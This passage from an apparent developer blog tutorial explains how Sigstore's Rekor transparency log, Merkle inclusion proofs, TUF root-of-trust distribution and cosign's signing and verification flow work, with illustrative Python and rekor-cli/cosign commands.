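def signed_while_cert_was_alive(integrated_time, not_before, not_after):
    # Valid iff the three instants are already in chronological order:
    # notBefore, then Rekor's integratedTime, then notAfter.
    ts = [not_before.timestamp(), float(integrated_time), not_after.timestamp()]
    return ts == sorted(ts)
```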

&lt;p&gt;Furthermore, Rekor structures its log as a &lt;strong&gt;Merkle Tree&lt;/strong&gt;, allowing anyone to mathematically verify that historical entries haven't been tampered with.&lt;/p&gt;
&lt;h3&gt;
  
  
  What is a Merkle Tree?
&lt;/h3&gt;

&lt;p&gt;A Merkle Tree is a binary hash tree designed to efficiently verify data integrity. It's the exact same voodoo powering Bitcoin's blockchain.&lt;/p&gt;

&lt;p&gt;The logic is simple: Put data hashes in the leaf nodes, concatenate two hashes and hash them again, and bubble it all the way up to a single Root Hash.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F08o2nxi9b3a195etg4qh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F08o2nxi9b3a195etg4qh.png" alt="merkle tree" width="800" height="305"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Because the Root Hash is signed and made public, &lt;strong&gt;if you tamper with a single entry anywhere in the tree, the Root Hash completely changes and the signature breaks&lt;/strong&gt;. That's how append-only logs guarantee integrity.&lt;/p&gt;
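&lt;p&gt;A minimal sketch of that bubbling-up, assuming a power-of-two number of entries (real CT/Rekor trees follow RFC 6962, which also adds distinct prefixes for leaf and interior hashes; omitted here to keep the shape visible):&lt;/p&gt;

```python
import hashlib

def h(data):
    return hashlib.sha256(data).digest()

def merkle_root(entries):
    # Hash every entry into a leaf, then repeatedly pair neighbors and
    # hash the concatenation until a single Root Hash remains.
    level = [h(e) for e in entries]
    while len(level) != 1:
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]
```

&lt;p&gt;Flip one byte in one entry and the Root Hash changes completely, which is exactly why a signed Root is enough to pin the whole log.&lt;/p&gt;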
&lt;h3&gt;
  
  
  Inclusion Proof: Mathematically Proving an Entry Exists
&lt;/h3&gt;

&lt;p&gt;Suppose we want to prove, "Is Entry 2 really in this log?" Doing it naively requires downloading the entire log, but with a Merkle tree, you only need &lt;strong&gt;O(log n)&lt;/strong&gt; hashes.&lt;/p&gt;

&lt;p&gt;To construct an Inclusion Proof for Entry 2, you only need the &lt;strong&gt;hashes of the sibling nodes along the path from Entry 2 to the Root&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8pxk0j1lbzu8rp63u0xp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8pxk0j1lbzu8rp63u0xp.png" alt="Entry Exists" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Verification flow:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. H2 = Hash(Entry 2)              ← You calculate this locally
2. H23 = Hash(H2 + H3)             ← H3 comes from Rekor
3. Root' = Hash(H01 + H23)         ← H01 comes from Rekor
4. Check if Root' matches Rekor's signed Root Hash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For a tree with 4 entries, you only need &lt;strong&gt;2 hashes&lt;/strong&gt; (H3 and H01). Even for a tree with a million entries, you only need about 20 hashes. That's the terrifying efficiency of O(log n).&lt;/p&gt;
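&lt;p&gt;The same four steps in runnable form (simplified: plain sha256 concatenation, without RFC 6962's leaf/node prefixes). The entry's index tells the verifier which side each sibling hash sits on:&lt;/p&gt;

```python
import hashlib

def h(data):
    return hashlib.sha256(data).digest()

def verify_inclusion(entry, index, proof, signed_root):
    # Recompute the Root from the entry plus its O(log n) sibling
    # hashes; at each level, the parity of the index says whether the
    # sibling sits on the left or the right.
    node = h(entry)
    for sibling in proof:
        if index % 2 == 0:
            node = h(node + sibling)   # sibling on the right
        else:
            node = h(sibling + node)   # sibling on the left
        index //= 2
    return node == signed_root

# The 4-entry tree from the figure: the proof for Entry 2 is [H3, H01].
entries = [b"Entry 0", b"Entry 1", b"Entry 2", b"Entry 3"]
h0, h1, h2, h3 = (h(e) for e in entries)
h01, h23 = h(h0 + h1), h(h2 + h3)
root = h(h01 + h23)
```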

&lt;h3&gt;
  
  
  The Data Written into Rekor
&lt;/h3&gt;

&lt;p&gt;Each entry (usually a &lt;code&gt;hashedrekord&lt;/code&gt; type) contains:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"apiVersion"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"0.0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"kind"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"hashedrekord"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"spec"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"data"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"hash"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"algorithm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"410dabcd6f1d..."&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"signature"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"content"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"MEUCIQDx...(base64 encoded signature)..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"publicKey"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"content"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"LS0tLS1C...(base64 encoded Fulcio cert)..."&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Rekor also slaps on server-side metadata:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;What it is&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;logIndex&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The sequential index in the log (0, 1, 2, ...)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;integratedTime&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The UNIX timestamp when Rekor added the entry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;logID&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The ID of the log shard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;verification.inclusionProof&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The Merkle Inclusion Proof (array of hashes + Root Hash)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;verification.signedEntryTimestamp&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The timestamp signed by Rekor's private key&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;These &lt;code&gt;integratedTime&lt;/code&gt; and &lt;code&gt;signedEntryTimestamp&lt;/code&gt; fields are your temporal proof. Even after the Fulcio certificate dies 10 minutes later, &lt;strong&gt;Rekor's immutable ledger will forever testify that "at that specific moment, this cert was valid."&lt;/strong&gt; This is the magic trick that lets us throw our keys away.&lt;/p&gt;
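&lt;p&gt;Concretely, the verifier just checks that the logged timestamp lands inside the certificate's validity window. A minimal sketch (the input mirrors Rekor's &lt;code&gt;integratedTime&lt;/code&gt; UNIX timestamp; the 10-minute window is the usual Fulcio lifetime):&lt;/p&gt;

```python
from datetime import datetime, timedelta, timezone

def logged_while_cert_valid(integrated_time, not_before, not_after):
    # integrated_time is a UNIX timestamp, exactly as Rekor records it.
    t = datetime.fromtimestamp(integrated_time, tz=timezone.utc)
    return t >= not_before and not_after >= t

# A hypothetical Fulcio cert minted at 12:30 UTC with a 10-minute lifetime.
not_before = datetime(2026, 1, 11, 12, 30, tzinfo=timezone.utc)
not_after = not_before + timedelta(minutes=10)

signed_in_time = int(datetime(2026, 1, 11, 12, 34, 56, tzinfo=timezone.utc).timestamp())
signed_too_late = int((not_after + timedelta(hours=1)).timestamp())

assert logged_while_cert_valid(signed_in_time, not_before, not_after)
assert not logged_while_cert_valid(signed_too_late, not_before, not_after)
```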

&lt;h3&gt;
  
  
  Rekor v2: The Next-Gen Tessera Architecture
&lt;/h3&gt;

&lt;p&gt;Rekor v1 ran on Google's Trillian (the exact same backend used for Certificate Transparency) backed by MariaDB. However, &lt;strong&gt;Rekor v2&lt;/strong&gt;, which went GA in October 2025, completely swapped out the backend for &lt;strong&gt;Trillian-Tessera&lt;/strong&gt; (a tile-based transparency log implementation).&lt;/p&gt;

&lt;p&gt;Key changes from v1 to v2:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;v1&lt;/th&gt;
&lt;th&gt;v2&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Backend&lt;/td&gt;
&lt;td&gt;Trillian + MariaDB&lt;/td&gt;
&lt;td&gt;Tessera (Tile-based)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supported Types&lt;/td&gt;
&lt;td&gt;11 types (&lt;code&gt;hashedrekord&lt;/code&gt;, &lt;code&gt;dsse&lt;/code&gt;, &lt;code&gt;intoto&lt;/code&gt;, etc.)&lt;/td&gt;
&lt;td&gt;Only &lt;code&gt;hashedrekord&lt;/code&gt; and &lt;code&gt;dsse&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;API&lt;/td&gt;
&lt;td&gt;Multiple endpoints&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;POST /api/v2/log/entries&lt;/code&gt; only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reads&lt;/td&gt;
&lt;td&gt;Processed by server&lt;/td&gt;
&lt;td&gt;Highly cacheable via CDN&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Witnessing&lt;/td&gt;
&lt;td&gt;Dependent on external systems&lt;/td&gt;
&lt;td&gt;Natively embedded&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Timestamps&lt;/td&gt;
&lt;td&gt;Generated by Rekor&lt;/td&gt;
&lt;td&gt;Sourced from a separate Timestamp Authority&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URLs&lt;/td&gt;
&lt;td&gt;Single URL&lt;/td&gt;
&lt;td&gt;Sharded (&lt;code&gt;logYEAR-rev.rekor.sigstore.dev&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Rekor v1 will continue running concurrently, with a 1-year deprecation notice before it is frozen. Clients (Cosign v2.6.0+) automatically shift to v2 based on the &lt;code&gt;SigningConfig&lt;/code&gt; and &lt;code&gt;TrustedRoot&lt;/code&gt; distributed via TUF.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hands-on: Querying Rekor
&lt;/h3&gt;

&lt;p&gt;Let's pull the signature from our previous article straight out of Rekor.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install rekor-cli&lt;/span&gt;
brew &lt;span class="nb"&gt;install &lt;/span&gt;rekor-cli

&lt;span class="c"&gt;# Check the state of the log&lt;/span&gt;
rekor-cli loginfo
&lt;span class="c"&gt;# Verification Successful!&lt;/span&gt;
&lt;span class="c"&gt;# Tree Size: 161024891&lt;/span&gt;
&lt;span class="c"&gt;# Root Hash: 5a4b...&lt;/span&gt;

&lt;span class="c"&gt;# Search for entries signed by your email&lt;/span&gt;
rekor-cli search &lt;span class="nt"&gt;--email&lt;/span&gt; you@example.com
&lt;span class="c"&gt;# Found matching entries (listed by UUID):&lt;/span&gt;
&lt;span class="c"&gt;# 24296fb24b8ad77a...&lt;/span&gt;

&lt;span class="c"&gt;# Fetch the raw entry data&lt;/span&gt;
rekor-cli get &lt;span class="nt"&gt;--uuid&lt;/span&gt; 24296fb24b8ad77a...
&lt;span class="c"&gt;# LogID: c0d23d6ad406973f...&lt;/span&gt;
&lt;span class="c"&gt;# Attestation:&lt;/span&gt;
&lt;span class="c"&gt;# Index: 95829475&lt;/span&gt;
&lt;span class="c"&gt;# IntegratedTime: 2026-01-11T12:34:56Z&lt;/span&gt;
&lt;span class="c"&gt;# UUID: 24296fb24b8ad77a...&lt;/span&gt;
&lt;span class="c"&gt;# Body: {&lt;/span&gt;
&lt;span class="c"&gt;#   "HashedRekordObj": {&lt;/span&gt;
&lt;span class="c"&gt;#     "data": { "hash": { "algorithm": "sha256", "value": "..." } },&lt;/span&gt;
&lt;span class="c"&gt;#     "signature": { "content": "...", "publicKey": { "content": "..." } }&lt;/span&gt;
&lt;span class="c"&gt;#   }&lt;/span&gt;
&lt;span class="c"&gt;# }&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Your signature is immortalized in a public log. Since anyone in the world can read it, if an attacker somehow bypasses OIDC and signs something using your identity, you will spot the anomaly simply by monitoring the ledger.&lt;/p&gt;
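&lt;p&gt;Monitoring doesn't require anything fancy. As a sketch, the same search index that &lt;code&gt;rekor-cli search --email&lt;/code&gt; hits is a plain REST endpoint, so a cron job can diff the UUIDs it returns against the signatures you know you made (endpoint path and payload shape per the Rekor v1 API; treat this as illustrative, not production monitoring):&lt;/p&gt;

```python
import json
import urllib.request

REKOR = "https://rekor.sigstore.dev"

def search_by_email(email):
    # POST /api/v1/index/retrieve is what rekor-cli search uses under the hood.
    req = urllib.request.Request(
        REKOR + "/api/v1/index/retrieve",
        data=json.dumps({"email": email}).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)  # a list of entry UUIDs

def unexpected_entries(found, known_uuids):
    # Anything signed "as you" that you don't recognize is a red flag.
    return [uuid for uuid in found if uuid not in known_uuids]

# The diffing logic works without touching the network:
known = {"24296fb24b8ad77a"}
assert unexpected_entries(["24296fb24b8ad77a", "feedface"], known) == ["feedface"]
```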




&lt;h2&gt;
  
  
  5. TUF: Defending the Root of Trust
&lt;/h2&gt;

&lt;p&gt;Everything we've discussed relies on a single, terrifying assumption: &lt;strong&gt;"The Fulcio Root CA and the Rekor public key are authentic."&lt;/strong&gt; If an attacker swaps those out, the entire house of cards collapses instantly.&lt;/p&gt;

&lt;p&gt;Safely distributing this "Trust Root" is the job of &lt;strong&gt;TUF (The Update Framework)&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why the Naive Approach Fails
&lt;/h3&gt;

&lt;p&gt;You might think, "Just hardcode the root cert into the Cosign binary!" But that's a trap for two reasons:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Forced binary updates for key rotation.&lt;/strong&gt; Every time Fulcio rotates its Root CA, every single user globally would have to re-download and reinstall Cosign.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CDN compromise leads to total takeover.&lt;/strong&gt; If the download server gets hacked, attackers just ship a modified binary with their own root cert. Game over.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;TUF is a framework specifically engineered to mathematically defeat rollback attacks, freeze attacks, mix-and-match attacks, arbitrary software attacks, and total-collapse-via-single-key compromises.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Four Roles of TUF
&lt;/h3&gt;

&lt;p&gt;TUF structures its chain of trust using four metadata files (roles).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1qcjjaf240opeqnw5wza.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1qcjjaf240opeqnw5wza.png" alt="TUF" width="800" height="674"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's how they interact:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;root.json&lt;/strong&gt;: The absolute god-key. It defines the public keys for all other roles and their threshold signatures (e.g., 3-of-5).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;targets.json&lt;/strong&gt;: Records the hashes and sizes of the actual files we want (&lt;code&gt;trusted_root.json&lt;/code&gt;, &lt;code&gt;fulcio.crt.pem&lt;/code&gt;, &lt;code&gt;rekor.pub&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;snapshot.json&lt;/strong&gt;: Locks down the exact versions of the targets. This stops attackers from mixing an old &lt;code&gt;targets.json&lt;/code&gt; with a new &lt;code&gt;root.json&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;timestamp.json&lt;/strong&gt;: Updated constantly with a very short lifespan. This physically prevents attackers from feeding you stale metadata and claiming it's fresh.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Root Key Ceremony: Forging Trust in Public
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;root.json&lt;/code&gt; is the single most critical file in Sigstore's security model. It is signed during a highly orchestrated public event called the &lt;strong&gt;Key Ceremony&lt;/strong&gt;. The first one in June 2021 was literally live-streamed on CloudNative.tv.&lt;/p&gt;

&lt;p&gt;Five trusted keyholders take physical hardware security keys and perform a 3-of-5 threshold signature to mint the &lt;code&gt;root.json&lt;/code&gt;. The entire process is recorded, audited, and committed to the &lt;code&gt;sigstore/root-signing&lt;/code&gt; repo. Unless an attacker physically robs three keyholders at gunpoint simultaneously, &lt;code&gt;root.json&lt;/code&gt; cannot be forged.&lt;/p&gt;

&lt;h3&gt;
  
  
  Bootstrapping: Establishing Trust on First Run
&lt;/h3&gt;

&lt;p&gt;Cosign ships with a very old, foundational &lt;code&gt;root.json&lt;/code&gt; hardcoded into the binary. On the first run, it executes the following protocol to safely fetch the latest Trust Root.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3kvg71vm274lb8ujeq89.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3kvg71vm274lb8ujeq89.png" alt="boostrap" width="544" height="911"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The genius here is the &lt;strong&gt;chained verification of &lt;code&gt;root.json&lt;/code&gt;&lt;/strong&gt;. Version N is explicitly verified by the keys from Version N-1. This means Sigstore can continuously rotate its root keys without forcing you to update your CLI binary. If the CDN is compromised and serves a bogus &lt;code&gt;root.json&lt;/code&gt;, your client instantly rejects it because the previous key's signature won't match.&lt;/p&gt;
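&lt;p&gt;The chaining rule is mechanical: version N's &lt;code&gt;root.json&lt;/code&gt; must carry at least &lt;code&gt;threshold&lt;/code&gt; signatures that verify under version N-1's keys. Here's a toy model of just that rule. Real TUF uses asymmetric signatures (Ed25519/ECDSA); HMAC-SHA256 stands in purely to keep the sketch stdlib-only:&lt;/p&gt;

```python
import hashlib
import hmac
import json

def toy_sign(key, payload):
    # Stand-in for a real signature scheme; the chaining logic is the point.
    return hmac.new(key, payload, hashlib.sha256).hexdigest()

def accept_next_root(prev_root, new_root_bytes, signatures, keys):
    # Count signatures over the NEW root that verify under the OLD root's keys.
    valid = sum(
        1
        for keyid in prev_root["keyids"]
        if keyid in signatures
        and hmac.compare_digest(signatures[keyid], toy_sign(keys[keyid], new_root_bytes))
    )
    return valid >= prev_root["threshold"]

keys = {"k%d" % i: ("secret-%d" % i).encode() for i in range(5)}
root_v1 = {"keyids": sorted(keys), "threshold": 3}   # 3-of-5, like Sigstore's
root_v2 = json.dumps({"version": 2}).encode()

enough = {k: toy_sign(keys[k], root_v2) for k in ("k0", "k1", "k2")}
too_few = {k: toy_sign(keys[k], root_v2) for k in ("k0", "k1")}

assert accept_next_root(root_v1, root_v2, enough, keys)       # 3 valid sigs: rotate
assert not accept_next_root(root_v1, root_v2, too_few, keys)  # 2 valid sigs: reject
```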

&lt;p&gt;The final payload, &lt;code&gt;trusted_root.json&lt;/code&gt;, hands you everything you need—Fulcio's CA chain, Rekor's key, CT Log keys—safely and securely.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. The Full Flow: Deconstructing &lt;code&gt;cosign sign&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;Now that we understand the trinity of Fulcio, Rekor, and TUF, let's look at exactly what happens when you type &lt;code&gt;cosign sign $IMAGE&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fschm0zr48xg5tgntl52t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fschm0zr48xg5tgntl52t.png" alt="sequence" width="800" height="523"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Side Note: What "Signing a Container" Actually Means
&lt;/h3&gt;

&lt;p&gt;Let's clear up a massive misconception. "Signing an image" does &lt;strong&gt;not&lt;/strong&gt; mean injecting signature data inside the container image or its metadata.&lt;/p&gt;

&lt;p&gt;If you modify the container image to append a signature, the image's hash (digest) instantly changes, invalidating the signature you just applied. It's a fatal &lt;strong&gt;chicken-and-egg problem&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Cosign bypasses this using a &lt;strong&gt;Detached Signature&lt;/strong&gt; approach:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;It calculates the hash of the pristine image manifest (Step 4).&lt;/li&gt;
&lt;li&gt;It takes the resulting signature data, and instead of cramming it into the image, it &lt;strong&gt;pushes it back to the exact same registry, right next to the original image, disguised as a dummy OCI Artifact with a &lt;code&gt;.sig&lt;/code&gt; tag&lt;/strong&gt; (Step 6).
&lt;em&gt;Note: The latest OCI v1.1 spec added the Referrers API, allowing manifests to link to each other directly without relying on ugly &lt;code&gt;.sig&lt;/code&gt; tags.&lt;/em&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Signing a container literally just means &lt;strong&gt;"creating cryptographic proof of its hash and sliding it quietly onto the shelf next to the original."&lt;/strong&gt;&lt;/p&gt;
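&lt;p&gt;And the "shelf next to the original" has a predictable address: cosign's conventional (pre-Referrers-API) scheme derives the signature tag straight from the image digest, which is why no database or sidecar lookup is needed:&lt;/p&gt;

```python
def signature_tag(image_digest):
    # cosign's tag convention: "sha256:abc..." becomes "sha256-abc....sig",
    # pushed to the same repository as the image itself.
    algo, _, hex_digest = image_digest.partition(":")
    return "%s-%s.sig" % (algo, hex_digest)

digest = "sha256:410dabcd6f1d"  # hypothetical, truncated for readability
assert signature_tag(digest) == "sha256-410dabcd6f1d.sig"
```

So verification simply pulls the same repository at that derived tag and reads the signature back out.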

&lt;p&gt;The private key only exists in RAM for the few seconds between Step 1 and Step 7. Once it's nuked, nobody in the universe—not even you—can ever sign anything with it again.&lt;/p&gt;

&lt;p&gt;When you verify it, you don't use a key; you use an &lt;strong&gt;identity&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &lt;span class="nv"&gt;$IMAGE&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"you@gmail.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://accounts.google.com"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here's the verification logic:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pull the signature manifest (the &lt;code&gt;.sig&lt;/code&gt; tag) from the registry.&lt;/li&gt;
&lt;li&gt;Extract the signature, the Fulcio cert, and the Rekor log entry.&lt;/li&gt;
&lt;li&gt;Validate the cert chain up to the Fulcio Root CA (which we got from TUF).&lt;/li&gt;
&lt;li&gt;Verify Rekor's &lt;code&gt;integratedTime&lt;/code&gt; falls inside the cert's 10-minute validity window.&lt;/li&gt;
&lt;li&gt;Confirm the cert's SAN exactly matches &lt;code&gt;--certificate-identity&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Confirm the OIDC issuer recorded in the cert's Fulcio OID extension matches &lt;code&gt;--certificate-oidc-issuer&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Use the public key embedded in the cert to mathematically verify the image digest signature.&lt;/li&gt;
&lt;li&gt;Verify Rekor's Inclusion Proof using Rekor's public key (from TUF).&lt;/li&gt;
&lt;/ol&gt;
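&lt;p&gt;Steps 5 and 6 are plain string comparisons, but they're the ones that bind the signature to a human-meaningful identity. A minimal sketch (field names are illustrative; the real values come out of the Fulcio certificate):&lt;/p&gt;

```python
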